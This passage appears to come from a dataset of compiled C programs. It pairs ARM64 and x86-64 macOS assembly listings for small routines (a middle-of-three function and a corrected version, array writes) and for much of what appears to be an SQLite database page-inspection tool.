.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl %edx, -12(%rbp)
movl -12(%rbp), %eax
movl %eax, -16(%rbp)
movl -8(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB2_7
## %bb.1:
movl -4(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB2_3
## %bb.2:
movl -8(%rbp), %eax
movl %eax, -16(%rbp)
jmp LBB2_6
LBB2_3:
movl -4(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB2_5
## %bb.4:
movl -8(%rbp), %eax
movl %eax, -16(%rbp)
LBB2_5:
jmp LBB2_6
LBB2_6:
jmp LBB2_13
LBB2_7:
movl -4(%rbp), %eax
cmpl -8(%rbp), %eax
jle LBB2_9
## %bb.8:
movl -8(%rbp), %eax
movl %eax, -16(%rbp)
jmp LBB2_12
LBB2_9:
movl -4(%rbp), %eax
cmpl -12(%rbp), %eax
jle LBB2_11
## %bb.10:
movl -4(%rbp), %eax
movl %eax, -16(%rbp)
LBB2_11:
jmp LBB2_12
LBB2_12:
jmp LBB2_13
LBB2_13:
movl -16(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _correctMid ## -- Begin function correctMid
.p2align 4, 0x90
_correctMid: ## @correctMid
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl %edx, -12(%rbp)
movl -12(%rbp), %eax
movl %eax, -16(%rbp)
movl -8(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB3_7
## %bb.1:
movl -4(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB3_3
## %bb.2:
movl -8(%rbp), %eax
movl %eax, -16(%rbp)
jmp LBB3_6
LBB3_3:
movl -4(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB3_5
## %bb.4:
movl -4(%rbp), %eax
movl %eax, -16(%rbp)
LBB3_5:
jmp LBB3_6
LBB3_6:
jmp LBB3_13
LBB3_7:
movl -4(%rbp), %eax
cmpl -8(%rbp), %eax
jle LBB3_9
## %bb.8:
movl -8(%rbp), %eax
movl %eax, -16(%rbp)
jmp LBB3_12
LBB3_9:
movl -4(%rbp), %eax
cmpl -12(%rbp), %eax
jle LBB3_11
## %bb.10:
movl -4(%rbp), %eax
movl %eax, -16(%rbp)
LBB3_11:
jmp LBB3_12
LBB3_12:
jmp LBB3_13
LBB3_13:
movl -16(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/12638346.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
adrp x9, l___const.main.array@PAGE
add x9, x9, l___const.main.array@PAGEOFF
ldr q0, [x9]
sub x8, x29, #32
stur q0, [x29, #-32]
ldr w9, [x9, #16]
stur w9, [x29, #-16]
str x8, [sp, #24]
ldr x9, [sp, #24]
mov w8, #5
str w8, [x9]
ldr x9, [sp, #24]
ldrsw x10, [sp, #20]
mov w8, #6
str w8, [x9, x10, lsl #2]
adrp x9, l___const.main.new_array@PAGE
add x9, x9, l___const.main.new_array@PAGEOFF
ldr q0, [x9]
add x8, sp, #32
str q0, [sp, #32]
ldr w9, [x9, #16]
str w9, [sp, #48]
str x8, [sp, #8]
mov w8, #1
str w8, [sp, #4]
ldr x9, [sp, #8]
ldrsw x10, [sp, #4]
mov w8, #7
str w8, [x9, x10, lsl #2]
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
bl ___stack_chk_fail
LBB0_2:
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.section __TEXT,__const
.p2align 2 ; @__const.main.array
l___const.main.array:
.long 1 ; 0x1
.long 2 ; 0x2
.long 3 ; 0x3
.long 4 ; 0x4
.long 5 ; 0x5
.p2align 2 ; @__const.main.new_array
l___const.main.new_array:
.long 1 ; 0x1
.long 2 ; 0x2
.long 3 ; 0x3
.long 4 ; 0x4
.long 5 ; 0x5
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq l___const.main.array(%rip), %rax
movq %rax, -32(%rbp)
movq l___const.main.array+8(%rip), %rax
movq %rax, -24(%rbp)
movl l___const.main.array+16(%rip), %eax
movl %eax, -16(%rbp)
leaq -32(%rbp), %rax
movq %rax, -72(%rbp)
movq -72(%rbp), %rax
movl $5, (%rax)
movq -72(%rbp), %rax
movslq -76(%rbp), %rcx
movl $6, (%rax,%rcx,4)
movq l___const.main.new_array(%rip), %rax
movq %rax, -64(%rbp)
movq l___const.main.new_array+8(%rip), %rax
movq %rax, -56(%rbp)
movl l___const.main.new_array+16(%rip), %eax
movl %eax, -48(%rbp)
leaq -64(%rbp), %rax
movq %rax, -88(%rbp)
movl $1, -92(%rbp)
movq -88(%rbp), %rax
movslq -92(%rbp), %rcx
movl $7, (%rax,%rcx,4)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_2
## %bb.1:
addq $96, %rsp
popq %rbp
retq
LBB0_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__const
.p2align 4 ## @__const.main.array
l___const.main.array:
.long 1 ## 0x1
.long 2 ## 0x2
.long 3 ## 0x3
.long 4 ## 0x4
.long 5 ## 0x5
.p2align 4 ## @__const.main.new_array
l___const.main.new_array:
.long 1 ## 0x1
.long 2 ## 0x2
.long 3 ## 0x3
.long 4 ## 0x4
.long 5 ## 0x5
.subsections_via_symbols
| the_stack_data/32950100.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _f ; -- Begin function f
.p2align 2
_f: ; @f
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
mov w0, #1
str w0, [x8]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl __start ; -- Begin function _start
.p2align 2
__start: ; @_start
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, _g@GOTPAGE
ldr x0, [x0, _g@GOTPAGEOFF]
mov x8, x0
str x8, [sp, #8]
bl _f
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.comm _g,4,2 ; @g
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _f ## -- Begin function f
.p2align 4, 0x90
_f: ## @f
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movl $1, (%rax)
movl $1, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl __start ## -- Begin function _start
.p2align 4, 0x90
__start: ## @_start
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq _g@GOTPCREL(%rip), %rax
movq %rax, -8(%rbp)
movq _g@GOTPCREL(%rip), %rdi
callq _f
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.comm _g,4,2 ## @g
.subsections_via_symbols
| the_stack_data/167330513.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #320
.cfi_def_cfa_offset 320
stp x28, x27, [sp, #288] ; 16-byte Folded Spill
stp x29, x30, [sp, #304] ; 16-byte Folded Spill
add x29, sp, #304
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
add x8, sp, #128
str x8, [sp, #40] ; 8-byte Folded Spill
adrp x9, ___stderrp@GOTPAGE
ldr x9, [x9, ___stderrp@GOTPAGEOFF]
str x9, [sp, #48] ; 8-byte Folded Spill
stur wzr, [x29, #-20]
stur w0, [x29, #-24]
str x1, [x8, #144]
ldur w8, [x29, #-24]
subs w8, w8, #2
cset w8, ge
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldr x0, [x8]
bl _usage
mov w0, #1
bl _exit
LBB0_2:
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldr x0, [x8, #8]
mov w1, #0
bl _open
adrp x8, _db@PAGE
str w0, [x8, _db@PAGEOFF]
ldr w8, [x8, _db@PAGEOFF]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x9, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x9]
ldr x9, [x8, #144]
ldr x10, [x9]
ldr x8, [x8, #144]
ldr x8, [x8, #8]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB0_4:
add x8, sp, #126
str x8, [sp, #32] ; 8-byte Folded Spill
strb wzr, [sp, #126]
strb wzr, [sp, #127]
adrp x8, _db@PAGE
str x8, [sp, #24] ; 8-byte Folded Spill
ldr w0, [x8, _db@PAGEOFF]
mov x1, #16
mov w2, #0
bl _lseek
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x1, [sp, #32] ; 8-byte Folded Reload
ldr w0, [x8, _db@PAGEOFF]
mov x2, #2
bl _read
subs x8, x0, #2
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
strh wzr, [sp, #126]
b LBB0_6
LBB0_6:
ldrb w9, [sp, #126]
ldrb w8, [sp, #127]
lsl w8, w8, #16
add w9, w8, w9, lsl #8
adrp x8, _pagesize@PAGE
str w9, [x8, _pagesize@PAGEOFF]
ldr w8, [x8, _pagesize@PAGEOFF]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
mov w8, #1024
adrp x9, _pagesize@PAGE
str w8, [x9, _pagesize@PAGEOFF]
b LBB0_8
LBB0_8:
adrp x8, _pagesize@PAGE
str x8, [sp, #16] ; 8-byte Folded Spill
ldr w9, [x8, _pagesize@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
adrp x8, _db@PAGE
ldr w0, [x8, _db@PAGEOFF]
add x1, sp, #128
bl _fstat
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x8, [x8, #96]
ldrsw x9, [x9, _pagesize@PAGEOFF]
sdiv x9, x8, x9
adrp x8, _mxPage@PAGE
; kill: def $w9 killed $w9 killed $x9
str w9, [x8, _mxPage@PAGEOFF]
ldr w9, [x8, _mxPage@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldur w8, [x29, #-24]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_14
b LBB0_9
LBB0_9:
mov w8, #1
str w8, [sp, #120]
b LBB0_10
LBB0_10: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #120]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_13
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_10 Depth=1
ldr w0, [sp, #120]
bl _print_page
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_10 Depth=1
ldr w8, [sp, #120]
add w8, w8, #1
str w8, [sp, #120]
b LBB0_10
LBB0_13:
b LBB0_64
LBB0_14:
mov w8, #2
str w8, [sp, #116]
b LBB0_15
LBB0_15: ; =>This Loop Header: Depth=1
; Child Loop BB0_42 Depth 2
; Child Loop BB0_59 Depth 2
ldr w8, [sp, #116]
ldur w9, [x29, #-24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_63
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldrsw x9, [sp, #116]
ldr x0, [x8, x9, lsl #3]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_18
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_15 Depth=1
bl _print_db_header
b LBB0_62
LBB0_18: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldrsw x9, [sp, #116]
ldr x0, [x8, x9, lsl #3]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_20
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldr x0, [x8, #8]
bl _page_usage_report
b LBB0_62
LBB0_20: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldrsw x9, [sp, #116]
ldr x0, [x8, x9, lsl #3]
adrp x1, l_.str.5@PAGE
add x1, x1, l_.str.5@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_22
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldr x0, [x8, #8]
bl _ptrmap_coverage_report
b LBB0_62
LBB0_22: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldrsw x9, [sp, #116]
ldr x0, [x8, x9, lsl #3]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_24
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldr x0, [x8]
bl _usage
b LBB0_62
LBB0_24: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldrsw x9, [sp, #116]
ldr x8, [x8, x9, lsl #3]
ldrsb w0, [x8]
bl _isdigit
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_26
b LBB0_25
LBB0_25: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x9, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x9]
ldr x9, [x8, #144]
ldr x10, [x9]
ldr x8, [x8, #144]
ldrsw x9, [sp, #116]
ldr x8, [x8, x9, lsl #3]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
b LBB0_62
LBB0_26: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
ldr x8, [x8, #144]
ldrsw x9, [sp, #116]
ldr x0, [x8, x9, lsl #3]
add x1, sp, #96
mov w2, #0
bl _strtol
mov x8, x0
str w8, [sp, #112]
ldr x8, [sp, #96]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_29
b LBB0_27
LBB0_27: ; in Loop: Header=BB0_15 Depth=1
ldr x0, [sp, #96]
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_29
b LBB0_28
LBB0_28: ; in Loop: Header=BB0_15 Depth=1
adrp x8, _mxPage@PAGE
ldr w8, [x8, _mxPage@PAGEOFF]
str w8, [sp, #108]
b LBB0_54
LBB0_29: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_33
b LBB0_30
LBB0_30: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
ldrsb w8, [x8]
subs w8, w8, #46
cset w8, ne
tbnz w8, #0, LBB0_33
b LBB0_31
LBB0_31: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
ldrsb w8, [x8, #1]
subs w8, w8, #46
cset w8, ne
tbnz w8, #0, LBB0_33
b LBB0_32
LBB0_32: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
add x0, x8, #2
mov x1, #0
mov w2, #0
bl _strtol
mov x8, x0
str w8, [sp, #108]
b LBB0_53
LBB0_33: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_39
b LBB0_34
LBB0_34: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
ldrsb w8, [x8]
subs w8, w8, #98
cset w8, ne
tbnz w8, #0, LBB0_39
b LBB0_35
LBB0_35: ; in Loop: Header=BB0_15 Depth=1
ldr w8, [sp, #112]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_37
b LBB0_36
LBB0_36: ; in Loop: Header=BB0_15 Depth=1
mov w8, #100
str w8, [sp, #84]
str w8, [sp, #92]
adrp x8, _pagesize@PAGE
ldr w8, [x8, _pagesize@PAGEOFF]
subs w8, w8, #100
str w8, [sp, #88]
b LBB0_38
LBB0_37: ; in Loop: Header=BB0_15 Depth=1
str wzr, [sp, #84]
ldr w8, [sp, #112]
subs w9, w8, #1
adrp x8, _pagesize@PAGE
ldr w10, [x8, _pagesize@PAGEOFF]
mul w9, w9, w10
str w9, [sp, #92]
ldr w8, [x8, _pagesize@PAGEOFF]
str w8, [sp, #88]
b LBB0_38
LBB0_38: ; in Loop: Header=BB0_15 Depth=1
ldr w0, [sp, #92]
ldr w1, [sp, #88]
bl _getContent
str x0, [sp, #72]
ldr x0, [sp, #72]
ldr w1, [sp, #112]
ldr w2, [sp, #84]
ldr x8, [sp, #96]
add x3, x8, #1
bl _decode_btree_page
ldr x0, [sp, #72]
bl _free
b LBB0_62
LBB0_39: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_50
b LBB0_40
LBB0_40: ; in Loop: Header=BB0_15 Depth=1
ldr x8, [sp, #96]
ldrsb w8, [x8]
subs w8, w8, #116
cset w8, ne
tbnz w8, #0, LBB0_50
b LBB0_41
LBB0_41: ; in Loop: Header=BB0_15 Depth=1
str wzr, [sp, #68]
str wzr, [sp, #64]
mov w8, #1
str w8, [sp, #60]
b LBB0_42
LBB0_42: ; Parent Loop BB0_15 Depth=1
; => This Inner Loop Header: Depth=2
ldr x8, [sp, #96]
ldrsw x9, [sp, #60]
add x8, x8, x9
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_49
b LBB0_43
LBB0_43: ; in Loop: Header=BB0_42 Depth=2
ldr x8, [sp, #96]
ldrsw x9, [sp, #60]
ldrsb w8, [x8, x9]
subs w8, w8, #114
cset w8, ne
tbnz w8, #0, LBB0_45
b LBB0_44
LBB0_44: ; in Loop: Header=BB0_42 Depth=2
mov w8, #1
str w8, [sp, #64]
b LBB0_45
LBB0_45: ; in Loop: Header=BB0_42 Depth=2
ldr x8, [sp, #96]
ldrsw x9, [sp, #60]
ldrsb w8, [x8, x9]
subs w8, w8, #100
cset w8, ne
tbnz w8, #0, LBB0_47
b LBB0_46
LBB0_46: ; in Loop: Header=BB0_42 Depth=2
mov w8, #1
str w8, [sp, #68]
b LBB0_47
LBB0_47: ; in Loop: Header=BB0_42 Depth=2
b LBB0_48
LBB0_48: ; in Loop: Header=BB0_42 Depth=2
ldr w8, [sp, #60]
add w8, w8, #1
str w8, [sp, #60]
b LBB0_42
LBB0_49: ; in Loop: Header=BB0_15 Depth=1
ldr w0, [sp, #112]
adrp x8, _pagesize@PAGE
ldr w1, [x8, _pagesize@PAGEOFF]
ldr w2, [sp, #68]
ldr w3, [sp, #64]
bl _decode_trunk_page
b LBB0_62
LBB0_50: ; in Loop: Header=BB0_15 Depth=1
ldr w8, [sp, #112]
str w8, [sp, #108]
b LBB0_51
LBB0_51: ; in Loop: Header=BB0_15 Depth=1
b LBB0_52
LBB0_52: ; in Loop: Header=BB0_15 Depth=1
b LBB0_53
LBB0_53: ; in Loop: Header=BB0_15 Depth=1
b LBB0_54
LBB0_54: ; in Loop: Header=BB0_15 Depth=1
ldr w8, [sp, #112]
subs w8, w8, #1
cset w8, lt
tbnz w8, #0, LBB0_57
b LBB0_55
LBB0_55: ; in Loop: Header=BB0_15 Depth=1
ldr w8, [sp, #108]
ldr w9, [sp, #112]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB0_57
b LBB0_56
LBB0_56: ; in Loop: Header=BB0_15 Depth=1
ldr w8, [sp, #108]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_58
b LBB0_57
LBB0_57:
ldr x8, [sp, #48] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x8, _mxPage@PAGE
ldr w9, [x8, _mxPage@PAGEOFF]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB0_58: ; in Loop: Header=BB0_15 Depth=1
b LBB0_59
LBB0_59: ; Parent Loop BB0_15 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #112]
ldr w9, [sp, #108]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_61
b LBB0_60
LBB0_60: ; in Loop: Header=BB0_59 Depth=2
ldr w0, [sp, #112]
bl _print_page
ldr w8, [sp, #112]
add w8, w8, #1
str w8, [sp, #112]
b LBB0_59
LBB0_61: ; in Loop: Header=BB0_15 Depth=1
b LBB0_62
LBB0_62: ; in Loop: Header=BB0_15 Depth=1
ldr w8, [sp, #116]
add w8, w8, #1
str w8, [sp, #116]
b LBB0_15
LBB0_63:
b LBB0_64
LBB0_64:
adrp x8, _db@PAGE
ldr w0, [x8, _db@PAGEOFF]
bl _close
mov w0, #0
ldp x29, x30, [sp, #304] ; 16-byte Folded Reload
ldp x28, x27, [sp, #288] ; 16-byte Folded Reload
add sp, sp, #320
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function usage
_usage: ; @usage
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #16] ; 8-byte Folded Spill
ldr x0, [x8]
ldur x8, [x29, #-8]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _fprintf
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fprintf
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function print_page
_print_page: ; @print_page
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
ldur w8, [x29, #-4]
subs w8, w8, #1
adrp x10, _pagesize@PAGE
str x10, [sp, #24] ; 8-byte Folded Spill
ldr w9, [x10, _pagesize@PAGEOFF]
mul w8, w8, w9
stur w8, [x29, #-8]
adrp x8, ___stdoutp@GOTPAGE
ldr x8, [x8, ___stdoutp@GOTPAGEOFF]
ldr x0, [x8]
ldur w8, [x29, #-4]
; implicit-def: $x11
mov x11, x8
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
ldur w9, [x29, #-8]
ldr w10, [x10, _pagesize@PAGEOFF]
add w9, w9, w10
subs w10, w9, #1
mov x9, sp
str x11, [x9]
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldur w0, [x29, #-8]
ldr w1, [x8, _pagesize@PAGEOFF]
mov w2, #0
bl _print_byte_range
stur x0, [x29, #-16]
ldur x0, [x29, #-16]
bl _free
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function print_db_header
_print_db_header: ; @print_db_header
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w2, #0
mov x0, x2
mov w1, #100
bl _print_byte_range
str x0, [sp, #8]
adrp x0, l_.str.23@PAGE
add x0, x0, l_.str.23@PAGEOFF
bl _printf
ldr x0, [sp, #8]
mov w1, #16
mov w2, #2
adrp x3, l_.str.24@PAGE
add x3, x3, l_.str.24@PAGEOFF
bl _print_decode_line
ldr x0, [sp, #8]
mov w1, #18
mov w2, #1
str w2, [sp] ; 4-byte Folded Spill
adrp x3, l_.str.25@PAGE
add x3, x3, l_.str.25@PAGEOFF
bl _print_decode_line
ldr w2, [sp] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #19
adrp x3, l_.str.26@PAGE
add x3, x3, l_.str.26@PAGEOFF
bl _print_decode_line
ldr w2, [sp] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #20
adrp x3, l_.str.27@PAGE
add x3, x3, l_.str.27@PAGEOFF
bl _print_decode_line
ldr x0, [sp, #8]
mov w1, #24
mov w2, #4
str w2, [sp, #4] ; 4-byte Folded Spill
adrp x3, l_.str.28@PAGE
add x3, x3, l_.str.28@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #28
adrp x3, l_.str.29@PAGE
add x3, x3, l_.str.29@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #32
adrp x3, l_.str.30@PAGE
add x3, x3, l_.str.30@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #36
adrp x3, l_.str.31@PAGE
add x3, x3, l_.str.31@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #40
adrp x3, l_.str.32@PAGE
add x3, x3, l_.str.32@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #44
adrp x3, l_.str.33@PAGE
add x3, x3, l_.str.33@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #48
adrp x3, l_.str.34@PAGE
add x3, x3, l_.str.34@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #4] ; 4-byte Folded Reload
ldr x0, [sp, #8]
mov w1, #52
adrp x3, l_.str.35@PAGE
